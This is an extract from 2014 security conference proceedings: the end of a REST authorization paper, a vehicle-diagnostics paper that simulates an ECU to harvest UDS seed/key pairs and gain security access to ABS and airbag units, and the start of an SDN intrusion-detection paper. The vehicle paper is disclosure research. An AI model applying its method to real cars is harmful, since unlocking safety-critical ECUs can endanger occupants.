change in the authorization rules may lead to changes in the
web service operations and can cause changes in systems
using the web service, when using the method. This depends
on the change and on the mapping of the abstract interface to
the language depend web service interface. In our REST
mapping, the URL does not change, but a new parameter
may be introduced. In this case, changing authorization rules
do not lead to changes in systems using the web service.
Even so, the web service has to be enhanced including
overhead.
Additionally, the approach introduced is systematical, but
we have not used a language to describe access control
policies. This is because we could not find a suitable
language. Possible candidates are the Unified Modeling
Language with SecureUML [4] and UMLsec [25] or the
Ponder Policy Specification Language (PPSL) [26]. But
UMLsec and SecureUML need to be enhanced, to support
every kind of authorization. PPSL is not based on the UML
and has no visual representation, but we think both are
important prerequisites so that the approach is used.
Another limitation concerning REST is the restricted
functionality of HTTP’s OPTIONS method. An OPTIONS
call to a resource is responded with a list of allowed methods
on that resources and using one of them should not result in a
405 Method Not Allowed error code. However, after
applying this paper’s approach, the method name is not
sufficient to formulate valid requests – information about
valid authorization parameter values are required (see
Section III). The response is expressed in a list of commaseparated HTTP methods and there seems to be no
possibility to additionally provide parameter values.
VI.
CONCLUSION AND FUTURE WORK
We introduced a new way of designing interface methods
by using security patterns. For this method, we showed that
the attack surface on the interface is minimized according to
the least privilege needed. Additionally, we showed how to
combine the method with the REST paradigm and therefore,
create REST-compliant web services.
199
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
The application of the method was shown within the
Participation Service of the KIT-SC. In this application, at
least the disadvantage of creating many interface methods by
applying our approach arose. However, the attack surface
has been reduced. By giving a mapping from the technology
independent web service to a RESTful web service, the
approach facilitates a REST-compliant Participation Service.
The approach gives software architects the possibility to
improve the safety of web services using authorization
patterns. They can follow instructions to improve quality
attributes of the application in a systematic way without
having a security background or knowledge.
Software developers using the derived service interface
are aware of the privileges when using interface methods.
This increases the security according to secure interaction
design. Furthermore, the implementation of the service
interface can be easier tested, because the authorization
offers constraints for the operation to be implemented.
The disadvantage of creating many service interface
methods may be the focus of future work. For instance, this
phenomenon could be avoided by combining similar rights
for the same object to one service interface method. Another
starting point for future work is to research the advantages of
the static in contrast to the dynamic access decisions. This
can lead to an improved performance, improved security
through easier testing and easier externalization of access
decisions.
Our main goal is to combine the usage of security
patterns with quality attributes. This can lead to more precise
predictions on the quality of software. Therefore, nonfunctional requirements of stakeholders can be considered
during the design of an application. By offering systematical
methods, the quality can be ensured among the phases of the
software development.
[7]
[8]
[9]
[10]
[11]
[12]
[13]
[14]
[15]
[16]
REFERENCES
[1]
[2]
[3]
[4]
[5]
[6]
G. McGraw, “Software Security,” IEEE Security & Privacy,
pp.
80-83,
Mar.-Apr.
2004,
doi:10.1109/MSECP.2004.1281254.
M. Schumacher, E. Fernandez-Buglioni, D. Hybertson, F.
Buschmann, and P. Sommerlad, “Security Patterns:
Integrating Security and Systems Engineering,” John Wiley &
Sons, Dec. 2005, ISBN: 978-0-470-85884-4.
B. Alshammari, C. Fidge, and D. Corney, “Security Metrics
for Object-Oriented Designs,” IEEE 21. Australian Software
Engineering Conference (ASWEC), Apr. 2010, pp. 55-64,
doi:10.1109/ASWEC.2010.34.
D. Basin, J. Doser, and T. Lodderstedt, “Model Driven
Security: from UML Models to Access Control
Infrastructures,” ACM Transactions on Software Engineering
and Methodology (TOSEM), vol. 15, Jan. 2006, pp. 39-91,
doi:10.1145/1125808.1125810.
P. Manadhata, K. Tan, R. Maxion, and J. Wing, “An
Approach to Measuring A System’s Attack Surface,”
Carnegie Mellon University, Aug. 2007 [online]. Available
from: http://www.dtic.mil/cgi-bin/GetTRDoc?Location=U2&
doc=GetTRDoc.pdf&AD=ADA476805
[retrieved: 23.09.2014]
B. Alshammari, C. Fidge, and D. Corney, “Security Metrics
for Object-Oriented Class Designs,” IEEE 9th International
Conference on Quality Software, Aug. 2009, pp. 11-20,
doi:10.1109/QSIC.2009.11.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
[17]
[18]
[19]
[20]
[21]
[22]
[23]
T. Heumann, J. Keller, and S. Türpe, “Quantifying the Attack
Surface of a Web Application,” In Proceedings of Sicherheit
2010, vol. 170, 2010, pp. 305-316, ISBN: 978-3-88579-264-2.
G. Sumit, R. K. Nabanita, Mukesh, S. Saurabh, and M.
Pallavi, “Reducing Attack Surface of a Web Application by
Open Web Application Security Project Compliance,”
Defence Science Journal, vol. 62(5), Sep. 2012, pp. 324-330,
doi: 10.14429/dsj.62.1291.
M. Howard, “Attack Surface – Mitigate Security Risks by
Minimizing the Code You Expose to Untrusted Users,”
MSDN Magazine, November 2004. [Online]. Available from:
http://msdn.microsoft.com/en-us/magazine/cc163882.aspx
[retrieved: 23.09.2014]
A. Kurmus, A. Sorniotti, and R. Kapitza, “Attack Surface
Reduction For Commodity OS Kernels: trimmed garden
plants may attract less bugs,” in Proceedings of the Fourth
European Workshop on System Security (EUROSEC '11),
Apr. 2011, pp. 1-6, doi:10.1145/1972551.1972557.
A. Bartel, J. Klein, and M. Monperrus: “Automatically
Securing Permission-Based Software by Reducing the Attack
Surface: An Application to Android,” in Proceedings of the
27th IEEE/ACM International Conference on Automated
Software Engineering (ASE 2012), Sep. 2012, pp. 274-277,
doi: 10.1145/2351676.2351722.
K. Yee, “Guidelines and Strategies for Secure Interaction
Design,” Security and Usability: Designing Secure Systems
That People Can Use, pp. 247.273, Aug. 2005, ISBN: 978-0596-00827-7.
R. Fielding, “Architectural Styles and the Design of Networkbased Software Architectures,” Dissertation, University of
California, Irvine, 2000, ISBN: 0-599-87118-0.
M. Gebhart, P. Giessler, and P. Burkhardt, “Quality-Oriented
Requirements Engineering for Agile Development of
RESTful Participation Service,“ in press.
E. Yuan and J. Tong, “Attribute Based Access Control
(ABAC) for Web Services,” in Proceedings of the
International Conference on Web Services (ICWS), Jul. 2005,
pp. 561–569, doi:10.1109/ICWS.2005.25.
ISO/IEC, “ISO/IEC 25010:2011(E) Systems and software
engineering – Systems and software Quality Requirements
and Evaluation (SQuaRE) – System and software quality
models,” 2011.
R. Steinegger, “Authentication and authorization patterns in
existing security frameworks [Authentifizierungs- und
Autorisierungsmuster
in
bestehenden
SicherheitsFrameworks],” diploma thesis, Karlsruhe Institute of
Technology, Karlsruhe, Germany, 2012. German.
C. Pautasso and E. Wilde, “Why is the Web Loosely
Coupled? A Multi-Faceted Metric for Service Design,” in
Proceedings of the 18th international conference on World
wide web (WWW '09), Apr. 2009, pp. 911-920,
doi:10.1145/1526709.1526832.
A. Caballero, “Computer and Information Security
Handbook,” Morgan Kaufmann Publications, 2009, ISBN:
978-0123743541.
W3C, “Web Services Glossary,” Feb. 2004. [Online].
Available from: http://www.w3.org/TR/2004/NOTE-wsgloss-20040211/#webservice [retrieved: 23.09.2014]
L. Richardson and S. Ruby, “RESTful Web Services”,
O'Reilly Media, May 2007, ISBN: 978-0596529260.
ISO/IEC, “ISO/IEC 25000:2005(E) Software Engineering –
Software Product Quality Requirements and Evaluation
(SQuarE) – Guide to SQuaRE,” 2005.
S. Cohen, “Ontology and Taxonomy of Services in a ServiceOriented Architecture,” Microsoft Architect Journal, Apr.
2007.
200
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
[24] A. van Kesteren, “HTTP methods, Web browsers and
XMLHttpRequest,” Oct. 2007. [Online]. Available from:
http://annevankesteren.nl/2007/10/http-method-support
[retrieved: 23.09.2014]
[25] J. Jürjens, “UMLsec: Extending UML for Secure Systems
Development,” Lecture Notes in Computer Science, vol.
2460, pp. 412-425, Sep, 2002, doi:10.1007/3-540-45800X_32.
[26] N. Damianou, N. Dulay, E. Lupu, and M. Sloman, “The
Ponder Policy Specification Language,” in Proceedings of the
International Workshop on Policies for Distributed Systems
and Networks (POLICY '01), Jan. 2001, pp. 19-37, ISBN: 3540-41610-2.
[27] Auguste Kerckhoffs, “La cryptographie militaire,” Journal des
sciences militaires, vol. IX, Jan. 1883, pp. 5–38.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
201
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Evaluation of Vehicle Diagnostics Security –
Implementation of a Reproducible Security Access
Martin Ring, Tobias Rensen and Reiner Kriesten
University of Applied Sciences Karlsruhe
Karlsruhe, Germany
Emails: {rima0003, reto1014, krre001}@hs-karlsruhe.de
Abstract—Modern cars typically possess a network of
numerous Electronic Control Units (ECUs) which are
connected with each other by several bus systems. In
addition to the necessary on-board communication by
means of which the ECUs exchange information without
any influence from outside, there is a strong need for interaction with off-board systems. In this context, the vehicle
diagnostics can be mentioned as a significant example. It
is highly important that the connection between diagnostic
testers and the car is secured against unauthorized access.
This paper examines the development of a procedure as
well as a software tool for granting a reproducible access
to individual car ECUs without any professional testers.
If this access can be achieved by self-developed tools,
a possible security danger exists as malicious diagnostic
routines (not existing in professional car testers) can be
activated by using this access. If the ways to achieve this
access are known, it is possible to work on improving the
defence.
Keywords–security access; safety; diagnostics security;
data busses; communication standard.
I.
I NTRODUCTION
The increasing number of vehicle electronics [8] in
modern cars leads to a permanently rising focus on safety
and security aspects. Whereas safety can be described
as the fact that the vehicle acts adequately in critical
situations, security addresses the maturity of the car
system against attacks from outside.
Concerning the safety issues, the International Standardization Organisation (ISO) has released the automotive specific standard ISO 26262 [17]. However, the
standardization of security issues has not yet reached the
same level.
Especially, the connectivity of modern cars to the
outside world is a critical factor. Use cases like diagnostics exchange, navigation information, interaction with
mobile devices and personalized services can be easily
found. [3][4][5][12]
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
The easiest way to interact with the automotive network is via the On-Board-Diagnostics (OBD) connector.
This connector serves as central access to all ECUs available in a car. For safety critical diagnostic functions, a socalled security access is implemented in the diagnostics
standard [18].
We investigated if a self-written program can reliably
achieve security access to modern vehicles by means of
seed and key methods. Figure 4 describes the principles
behind this practise. After a security request from the
tester a random number, a so-called seed, is sent back
from the vehicle ECU. Afterwards, the tester performs
a secret coding algorithm and sends back the calculated
key which is evaluated in the ECU [18]. The respective
approach can be briefly described as follows:
•
Recording of the security access between vehicles and testers in order to get the overall protocol
sequence and information.
•
Implementing of a software tool which replaces
the car and requests keys from the tester in order
to get the possible seed and key pairs.
•
Testing the seed and key pairs for their reliable
use. This implies in particular that they are independent of date, vehicle and ECU specific information like the Vehicle Identification Number
(VIN).
Before the diagnostic data can be analysed, it is
important to know how to interpret the payload in the
CAN message, which is described in Section III. Section
IV describes the fundamentals needed to simulate an
ECU. The simulation of the ECU is described in Section
V. Lastly, Section VI shows the analysis of the key
exchange and which parameters are significant for its
calculation.
202
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
II.
R ELATED W ORK
Only a small number of scientific writings are available on this subject. Especially, works focusing on a
reliable procedure for gaining security access to the
ECUs/network of an arbitrary car are rare. The related
writings [3][4][5][12] mainly describe how to provoke a
security hazard by means of additional components or a
self-programmed code executed on existing components.
This paper examines the possibility of provoking a hazardous situation by gaining access to needed software
implementations, e.g., the ventilation of the Anti-lock
Braking System (ABS) unit.
III.
BASICS ON AUTOMOTIVE EMBEDDED
SYSTEMS
This section describes the fundamentals on embedded
automotive systems needed for understanding this paper.
A. Vehicle network: lower protocol layers
1) Electric architecture: Modern cars possess several
bus systems for the communication between the ECUs,
sensors and actuators. According to the AUTOSAR
Standard [14], these devices are categorised in multiple
networks, like body and comfort network,powertrain network or the infotainment network, seeFigure 1. The underlying bus system is further dependent on the necessary
data rate, cost aspects, real-time-abilities, etc. However,
the Controller Area Network (CAN) bus [16] is still the
most popular bus in modern vehicles. As the diagnostics
protocol usually is embedded in the CAN bus protocol,
the latter is described more detailed in the following
paragraph.
Powertrain Bus
(CAN)
Body & Comfort
Bus
(CAN, LIN)
Infotainment Bus
(CAN, FLexRay,
MOST)
Header
S
O
F
Gateway
Figure 1. Vehicle network example.
I
D
E
Daten 0-8 Byte
r
DLC
Data Field
Tailer
CRC
Sequence
D
E
L
A
C
K
D
E
L
EOF
Figure 2. CAN packet structure [4].
Figure 2 shows the structure of a CAN message
according to the standard ISO 11989. The most important
parts of the message regarding diagnostic messages are
the ID field containing the address of the ECU and the
diagnostic payload located in the data field.
B. Transport protocol
The transport protocol is standardized in the ISO
15765-2 [19] and is used for diagnostic purposes. This
protocol is located one layer above the CAN protocol
and allows upper services to transmit information
with a data length of possibly more than 8 byte. The
information of the Transport Protocol (TP) found in the
most significant bytes of the CAN data field. These bytes
are called Protocol Control Information (PCI). There
are four different types of messages, the first nibble of
the CAN data field contains the type information [5][11].
0h
Single frame: contains the entire payload (less
than 8 byte). The second nibble shows how much
data the packet contains.
1h
First frame: this is the first frame of a multipacket payload. The next three nibbles contain
the number of the whole diagnostic data.
2h
Consecutive frame: this message contains the rest
of the multi-packet payload. The second nibble
contains the order of the sent message.
3h
Flow control frame: this message is sent from
the receiver of the multi-packet payload. This
message is sent after the first frame [11].
Diagnostic tester
OBD Interface
Identifier
R
T
R
C. Vehicle networks: upper protocol layers
2) Information CAN bus: The CAN bus is the most
popular bus system in modern vehicles. In the U.S.,
it even is the standard for the OBD diagnostic since
2008. Regarding the physical characteristics, it uses a
differential data transmission in order to resist electrical
disturbances (to be seen as safety feature) and allows
data rates up to 500 kbit/s [4].
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
1) Diagnostic protocol standards (Application Layer):
There are two popular diagnostic protocols: one is the
Keyword Protocol (KWP) 2000 which is standardized
in the ISO 9141 and ISO 14230; the other one is the
Unified Diagnostic Services protocol (UDS) [18] which
is standardized in the IS0 14229. The operation of both
diagnostic protocols is almost identical. KWP 2000 was
203
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
Message Data
Service ID
SID
Subfunction
LEV
Request Parameters
Service
Request
SID | 40h
Subfunction
LEV
Response Parameters
Service
Response
Error ID
7Fh
Byte 1
SID
Error
Code
Byte 2
Byte 3
Negative
Response
Figure 3. UDS diagnostic protocol [13].
special LEVs for sending the key. All those subfunction
levels can be found in the security access service (SID:
27h ).
requestSeed: LEV 01h , 03h , 05h , 07h − 5Fh
sendKey:
LEV 02h , 04h , 06h , 08h − 60h [19]
The process of the Security Access is shown in
Figure 4.
Diagnostic tester
originally designed for the proprietary bus system KLine and is not used in modern cars anymore. Both
protocols work with Service Identifiers (SID). Every SID
represents a different action from an ECU which can be
specified by its LEVs (subfunction levels); see Figure 3.
The provided services are defined in the standards.
The services can be selected by the SID and LEV. These
two bytes are the first two diagnostic data bytes of the
message. There are three types of messages:
•
•
•
The request message. This message is sent by the
tester with the desired service.
The response message. This message is sent from
the ECU. The SID of the response message is
calculated by logical or-linking the SID of the
request message and 40h (e.g., 27h |40h = 67h ).
The error message starts with 7Fh , which is
followed by the SID of the request and an error
code with a length of one byte, as seen in Figure
3.
The control units communicate only after receiving
a request from the diagnostic tester. There is a clear
distribution of roles, in which the tester assumes the
role of the client and the control unit works as server.
This communication principle is also called request and
response.
D. Security Access in the diagnostic protocol
Today‘s security access is defined in the UDS standard. To access safety-critical-functions, the tester asks
the ECU for a seed. After receiving this seed, the tester
computes the according key, which is sent back to the
ECU. If the received key is consistent with the expected
key, access is granted [13]. Seed and key lengths, as well
as the algorithm to compute the key, are not specified in
the standard. Every vehicle manufacturer can implement
an arbitrary seed length and algorithm. It is also not
standardized if the seed is static or alternating. If the
security access is used, the standard specifies that there
are special LEVs to send the request for a seed and
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
ECU
request SecurityAccess
27 01 (request Seed)
positive Response
Key
calculation
67 01
12 34 56 78
(send Seed)
seed
request SecurityAccess
27 02
9A BC DE F0
Key
(send Key)
positive Response
67 02 (access)
Figure 4. Security access timing sequence [11].
The message structure of the diagnostic messages
from the tested vehicles follows the standardized protocols (with a few exceptions). The first byte of a single
message contains the information about the transport
protocol. In the message (listed below), the value is 02h .
The zero (first nibble) stands for a single message and
the two (second nibble) for two diagnostic data bytes.
The second byte contains the SID and the third is the
LEV (service and sub function).
Tester request data: 02 10 92 00 00 00 00 00
ECU response data: 02 50 92 38 37 30 32 39
IV.
TECHNICAL ACCESS SETUP FOR THE SECURITY
EVALUATION
This section describes the physical setup in order to
measure and record the diagnostic communications and
the decoding strategy of the messages according to the
given UDS standard.
In order to record the communication between the
tester and individual vehicles, an additional client was
added to the diagnostics line, a bus analysis tool running
on the attached PC; see Figure 5 [15].
Thus, the existing communication between different
cars and the tester could be easily recorded. In the second
step the bus analysis tool was used for the simulation of
204
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
A. Vehicle selection
CAN
interface
OBD
connector
Tester
Vehicle
network
Figure 5. Recording strategy for diagnostics communication.
TABLE I. C OMMUNICATION F ROM B EGIN TO S ECURITY ACCESS .
CAN Data
02 10 92
02 50 92
02 1A 87
10 16 5A
30 08 28
21 FF 07
22 30 34
23 33 32
02 3E 01
02 7E 00
02 27 01
05 67 01
04 27 02
03 67 02
00
FF
00
87
00
09
35
FF
00
00
00
F0
92
34
00
FF
00
01
00
09
34
FF
00
00
00
5E
16
00
00
FF
00
22
00
43
35
FF
00
00
00
00
00
00
00
FF
00
05
00
00
33
FF
00
00
00
00
00
00
00
FF
00
14
00
32
38
FF
00
00
00
00
00
00
description
session request
session response
session ECU info
send ECU Info1
send other parts
send ECU Info2
send ECU Info3
send ECU Info4
tester present
tester present
Security req.
send Seed
send Key
pos. access
send from
tester
ECU
tester
ECU
tester
ECU
ECU
ECU
tester
ECU
tester
ECU
tester
ECU
the car. To be more precise, the bus analysis tool provides
the messages which originally came from the real car;
see Figure 6. It further has to be noticed that there is
a reason for simulating the vehicle and not the tester;
while having only a few attempts for the security access
to car ECUs (afterwards, they deny any further access),
professional testers can be stimulated an infinite number
of times as in a typical environment they have to serve
numerous vehicles and have to be permanently available.
Bus analysis
program
Tester
Figure 6. Simulation mode.
Table I shows an exemplary protocol sequence at
the beginning of a security session. First, a handshake
between the tester and the ECU is initiated by the tester
including the exchange of specific ECU information.
Afterwards, the seed and key messages appear for the
authorization of the security access. In this context, it
still has to be mentioned that most of the message data
is standardized according to the UDS protocol.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
The choice of the investigated vehicles was influenced by the fact that since 2008 cars are offering the
UDS protocol being typically embedded within the CAN
bus. Considering this limiting conditions, six vehicles
produced by four different manufacturers have been
randomly chosen.
As a first result, it was not possible to perform
a security access for one specific car platform as the
corresponding services have not been implemented in
the tester. In this case, only diagnostic routines which do
not rely on the security access could be executed, e.g.,
reading/deleting error codes. Regarding all other tested
car manufacturers, the security access could be recorded.
To proceed, emphasis was put on two different cars of
one manufacturer. The reason for this decision is mainly
that this manufacturer implemented the security access
according to the UDS standard. The security access
was not implemented by all tested manufacturers, even
though there is a standard [18] which recommends this
access for certain safety critical functions. access to this
vehicles was unlimited.
B. Use cases for the execution of the security access
Table I displays the dial-up of the connection and the
exchange of the seed and key data. Both the seed and
the key are two bytes long which is car specific and
not described in the standard. For both tested vehicles of
this brand, the dial-up connection between the tester and
the vehicle and also the security access are identical to
the one shown in Table I, only the seeds, keys and ECU
information differ. In the first vehicle, the security access
appeared in the ABS ECU after selecting a specific safety
function of this ECU. For non-safety-relevant diagnostic
functions there was a request for the security access from
the tester; see Table II. In contrast, the ECU obviously
did not insist on the secure access, which affects the
protocol sequence in the following way: the ECU sends
zero information as key data (no security access needed)
being also responded with zero bytes from the tester.
TABLE II. S ECURITY ACCESS W ITH Z ERO B YTES.
CAN Data
02 27 01
05 67 01
04 27 02
03 67 02
00
00
00
34
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
00
description
Security req.
send zeros
send zeros for key
pos. access
send from
tester
ECU
Tester
ECU
205
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
V.
ECU
SIMULATION FOR A REPRODUCIBLE
SECURITY ACCESS
We implemented the communication behaviour of
both ECUs (ABS / Airbag) existing in the different
vehicles of which a security access was recorded; see
Figure 5. The GUI of the simulation allows the selection
of a car and the desired ECU. If a security access
has been successfully performed the GUI displays a
notification and the used seed and key data; see Figure 7.
The seeds sent to the tester are arbitrarily chosen by
the simulation program, so 216 = 65536 seed and key
pairs exist, due to it‘s 16 bits length. Further, they can
be written in a text-file before starting the simulation.
After all seeds have been sent, the program generates
a new file which stores the used seeds and its received
keys. As already mentioned, the data exchange works
only on request, which means that the whole simulation
is controlled by the diagnostic tester.
B. VIN independence
In the tester, a VIN can be selected in order to determine the associated car. Therefore, one can assume that
the seed and key data are dependent on the VIN. Thus,
the traffic between the tester and the ECU was analysed
and no VIN information was found. Furthermore, the
tester was provided with two different VINs and access
was requested using the same seed. As a result, the keys
again did not differ. To conclude, the security access is
independent of the VIN.
C. Independence of ECU specific data
In order to assure that the key is only dependent on the
given seed it is necessary to prove that the ECU specific
information does not change the key data. Again, the
simulation program twice requested keys while changing
the ECU specific data; see Table III. Once more, the
expected behaviour of independence could be confirmed.
TABLE III. C HANGED ECU I NFORMATION .
CAN Data
10 16 5A
21 FF 07
22 30 34
23 33 32
87
09
35
FF
01
09
34
FF
22
43
35
FF
05
00
33
FF
14
32
38
FF
description
send ECU Info1
send ECU Info2
send ECU Info3
send ECU Info4
send from
ECU
ECU
ECU
ECU
Figure 7. Panel for handling the ECUs and the security access.
VII.
VI.
S ECURITY ACCESS A NALYSIS
In order to implement a tool which can reliably
unlock different vehicles of the same model, it has to
be analysed if the key algorithm is reproducible. This
implies, in particular, the independence of the actual
time and vehicle specific values such as the Vehicle
Identification Number (VIN). In the following, the key
algorithm is evaluated regarding its independence of date,
VIN and ECU data.
A. Data independence
The same seed was sent to the tester twice on different
days. Each time the received key was identical. This
shows that the key calculation is independent of date
and time. Surely, this behaviour could be anticipated as
it is unlikely that both vehicle and tester share the same
timebase and use it for the seed/key calculation.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
C ONCLUSION AND F UTURE PROSPECTS
Evaluating the communication between modern vehicles and diagnostic testers enabled us to develop a
software tool which grants security access to special
electronic control units of modern vehicles. Using the
developed software tool it was possible to extract the
keys from the tested cars semi-automatically. As the respective process is not conducted fully automatically, the
extraction of all keys for 16-bit seed and key pairs would
take approximately 110 working hours. This workload
could be reduced by an additional automation of the
tester handling. It is also possible to generate a program
which determines the possible algorithms of a given
input and output vector. In a testrun, only 50 pairs were
needed to determine the respective algorithm. The fact
that it was possible to achieve security access can be
considered as crucial because this access can be used to
cause security critical and therefore dangerous conditions
or unintended actions while the vehicle is in motion.
Thus, it is recommended to improve the defence.
206
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
R EFERENCES
[1] K.
Beiter,
C.
Rätz,
and
O.
Garnatz,
“Gesetzliche On-Board-Diagnose und ODX (Statutory On-board Diagnostics and ODX).” [Online].
Available:
http://vector.com/portal/medien/diagnostics/odx/
Gesetzliche OnBoard Diagnose und ODX.pdf-2014.07.21
[19] ISO 15765-3 Implementation of Unified Diagnostic Services
(UDS on CAN), ISO Std.
[20] CAPL Function Reference Manuel, Vector Informatik GmbH,
November 2004.
[21] Programming with CAPL, Vector Informatik GmbH, Dezember
2004.
[2] K. Borgeest, Elektronik in der Fahrzeugtechnik (Electronics in
Vehicle Technology). Vieweg Verlag, 2007.
[3] S. Checkoway, D. McCoy, B. Kantor, D. Anderson,
H. Shacham, and S. Savage, “Comprehensive Experimental
Analyses of Automotive Attack Surfaces.” [Online].
Available: http://www.autosec.org/pubs/cars-usenixsec2011.
pdf-2014.07.21
[4] K. Koscher, A. Czeskis, F. Roesner, S. Patel,
and T. Kohno, “Experimental Security Analysis of
a Modern Automobile,” in 2010 IEEE Symposium
on Security and Privacy, 2010. [Online]. Available:
http://www.autosec.org/pubs/cars-oakland2010.pdf-2014.07.21
[5] C. Miller and C. Valasek, “Adventures in Automotive
Networks and Control Units.” [Online]. Available: http:
//illmatics.com/car hacking.pdf-2014.07.21
[6] T. Nosper, “Cotroller-Area-Network.” [Online]. Available: http://www.hs-weingarten.de/nosper/public/Download/
Kapitel202.720CAN-Neues20Layout.pdf-2014.07.21
[7] K. Reif, Automobilelektronik (Automotive Electronics).
Vieweg + Teubner Verlag, 2012.
[8] H.
Richter,
“Elektronik
und
Datenkommunikation
im Automobil (Electronics and Data Communication in Automotive Applications),” Institut fr Informatik, Technische Universitt Clausthal, Tech. Rep.
[Online]. Available: http://www.in.tu-clausthal.de/fileadmin/
homes/techreports/ifi0905richter.pdf-2014.07.21
[9] F. Schäfer, OBD Fahrzeudiagnose in der Praxis (OBD Vehicle
Diagnosis in practice). Franzis Verlag, 2012.
[10] T. Strang and M. Röckl, “Vehicle Networks CAN-based
Higher Layer Protocols,” 2008. [Online]. Available: http:
//www.sti-innsbruck.at/sites/default/files/courses/fileadmin/
documents/vn-ws0809/03-vn-CAN-HLP.pdf-2014.07.21
[11] J. Supke and W. Zimmermann, “Diagnosesysteme im Automobil (Diagnostic Systems in Automobiles).” [Online]. Available:
http://www.emotive.de/documents/WebcastsProtected/
Transport-Diagnoseprotokolle.pdf-2014.07.21
[12] M. Wolf, A. Weimerskirch, and T. Wollinger,
“State of the Art: Embedding Security in Vehicles,”
EURASIP Journal on Embedded Systems, April 2007.
[Online]. Available: http://downloads.hindawi.com/journals/es/
2007/074706.pdf-2014.07.21
[13] W. Zimmermann and R. Schnidgal, Bussysteme in der
Fahrzeugtechnik (Bussystems in Automotive Engineering).
Vieweg Verlag, 2007.
[14] Release
4.1
Overview
and
Revision
History,
AUTOSAR
Std.
[Online].
Available:
http:
//www.autosar.org/fileadmin/files/releases/4-1/AUTOSAR
TR ReleaseOverviewAndRevHistory.pdf-2014.07.21
[15] Handbuch CANoe (CANoe Manual), Vector Informatik GmbH.
[16] ISO 11898 CAN, ISO Std.
[17] ISO 26262 Safety, ISO Std.
[18] ISO 14229 Unified diagnostic services (UDS), ISO Std.
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
207
SECURWARE 2014 : The Eighth International Conference on Emerging Security Information, Systems and Technologies
An AMI Threat Detection Mechanism Based on SDN Networks
Po-Wen Chi∗ , Chien-Ting Kuo∗† , He-Ming Ruan∗, Shih-Jen Chen† , and Chin-Laung Lei∗
∗ Department
of Electrical Engineering, National Taiwan University, Taipei, Taiwan
Email: {d99921015, d98921027, d97921030, cllei}@ntu.edu.tw
† CyberTrust Technology Institute, Institute for Information Industry, Taipei, Taiwan
Email: {ctkuo, sjchen}@iii.org.tw
Abstract—The security of Advanced Metering Infrastructure
(AMI) systems draws more and more attention nowadays. Intrusion detection systems are often deployed on the backhaul
network to protect the AMI head-end system. In this paper, we
proposed an efficient way to build threat detecting mechanism in
AMI systems with the help of software defined networks (SDN).
Moreover, we also enhance the OpenFlow architecture to provide
more powerful detection mechanism to secure the AMI system.
The proposed solution not only enhances the security of AMI
systems, but also preserves the traffic quality of this structure.
Keywords–AMI; SDN; Specification-based detection
I. I NTRODUCTION
Recently, the AMI system, which serves as a key role in
Smart Grid, became popular due to the benefits it could bring.
This new infrastructure enables the exploration of the possibilities of energy utilization by providing certain communication
and control functionalities. However, AMI introduces new security challenges while providing various benefits due to semiopen networks, improper security mechanisms and immature
hardware design for AMI devices. There are already many
researches which introduce security issues in AMI systems,
such as [1][2]. The essence of AMI is a vast and distributed
sensor system tethered by the backhaul network and some
neighborhood networks (NANs) which can be open networks
or closed ones. It implies that anyone on the backhaul might
find their way to interfere with the AMI, especially the Internet
service providers (ISPs) who can possibly control partial or all
of the connections in an AMI system. Thus, we will focus on
the security issue in the backhaul network in this paper.
Traditional approaches to protect a device in an IT system
could be cryptographic tools such as mutual authentication
that ensures the identities of each end in a communication,
encryption and key management, which enforces the access
control over specific storage media, or digital signature, which
guarantees the source of a message. However, any of the
cryptographic measures require relatively powerful hardware,
and this implies that the cost of devices will be anything but
cheap. But the extremely large scale of AMI systems limits
the budget of the devices, and further constrains the capability
of the devices and the available protection approaches. Under
such dire condition, monitoring the security status of the AMI
system becomes a practical and economical solution. With the
status of the system security at hand, one can then address and
react to security events more effectively while the cost will
be much economical than traditional cryptographic protection
measures.
Traditional IDS systems mostly take signature-based detection as their core technology, which detects malicious activities
by describing these activities as signatures beforehand. Snort
Copyright (c) IARIA, 2014.
ISBN: 978-1-61208-376-6
[3] is the most popular open-sourced project of this kind of
IDS. However, this kind of detection alone is not sufficient
since it is difficult to list all malicious behaviors and nothing
can be done about unknown attacks. In order to provide a more
secure network environment, specification-based detection was
proposed [4][5]. With the specifications to describe the normal
activities, the IDS can collect all events which do not meet the
requirement of the AMI system. Thus, the administrator can
decide if the network is under attacks by comprehensive analysis of events. Therefore, the administrator can still be aware
of unknown attacks under the assistance of the specificationbased technology.
In addition to the specification-based detection system, we
observe that a new network trend, Software Defined Networking (SDN), is changing the network architecture. The SDN
could be a proper primitive for an AMI system due to the
vast and distributed nature of the AMI, which results in the
need of efficient management mechanisms to secure the AMI
systems. With the features of the SDN, it reveals a novel
approach for the administrator to dynamically perform flowlevel management over his own network. We believe that in the
near future, more and more networks will be SDN, including
AMI backhaul networks. So, we are motivated to build an IDS
in SDN-based AMI backhaul networks.
In this paper, we integrate the SDN technology with IDS
in the AMI system. First, we will show how to integrate
traditional IDS, Snort, with SDN efficiently by offloading some
checking rules from Snort to OpenFlow switches. Therefore,
IDS will afford more throughputs than legacy architecture.
Moreover, we propose an enhanced OpenFlow technology in
which OpenFlow switches are improved by additional specification checking agents. By using our enhanced OpenFlow
switches, the specification checking rules can be quickly deployed to each transmission path node in the AMI system from
OpenFlow controller. We also modify some parts of OpenFlow
protocol to support the proposed functionalities. If necessary,
we can also deploy the controllers hierarchically to scale out
the management capability for the future growth of the system
scale.
This paper is organized as follows: we will introduce
some related background knowledge, including the components of AMI system, the specification based IDS, and a brief
introduction to the SDN network in Section II. In Section
III, we will show how to integrate Snort with SDN in a
more efficient way than legacy network. Our new OpenFlow
